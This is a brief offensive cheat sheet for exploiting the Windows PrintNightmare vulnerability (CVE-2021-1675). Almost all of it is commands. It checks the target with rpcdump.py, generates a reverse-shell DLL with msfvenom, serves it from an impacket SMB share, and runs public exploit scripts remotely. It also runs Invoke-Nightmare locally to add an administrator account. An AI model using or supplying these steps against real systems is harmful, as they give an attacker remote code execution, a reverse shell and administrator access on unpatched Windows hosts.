# CVE-2021-1675 - PrintNightmare

To check if it's vulnerable,

Using impackets rpcdump.py, 

```
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol
```

Remote exploitation,

Generate a dll,

```
msfvenom -p windows/shell/reverse_tcp LHOST=`x` LPORT=443 -f dll > shell.dll
```

Serve the dll with smbserver

```
impacket-smbserver -debug morph3 . -smb2support
```

Exploiting it,

* <https://github.com/cube0x0/CVE-2021-1675>
* <https://github.com/ly4k/PrintNightmare>

```
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
```

Local exploitation,

* <https://github.com/calebstewart/CVE-2021-1675>

```
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"

or

Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default 
```

<br>